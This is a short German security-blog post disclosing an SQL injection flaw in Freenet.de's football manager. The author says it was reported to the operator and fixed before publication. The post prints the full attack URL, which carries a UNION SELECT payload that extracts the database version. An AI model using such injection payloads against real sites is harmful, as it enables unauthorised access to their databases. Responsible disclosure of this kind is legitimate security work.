Gehaxelts Blog

IT-Security & Hacking

[SQLi] Freenet.de

Ich hatte noch im letzten Jahr eine SQL Injection Lücke in dem Fußballmanager auf Freenet.de gefunden.

Nachdem ich eine kleine Hinweismail geschickt hatte, wurde diese Lücke noch bis vor Sylvester geschlossen, weswegen ich diese nun hier posten kann.

http://weltfussball.freenet.de/freenet/spieldetails.php?Liga=1&s_id=4818&p_id=13807&r_id=4&spiel_id=647568+%27and+%271%27=%272%27+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9--+

Leider habe ich verpasst einen Screen zu machen, dies werde ich aber bei den nächsten Lücken nachholen.

Gruß

hacks

« Einsicht in oVPN.to Was besagt der Hackerparagraph? »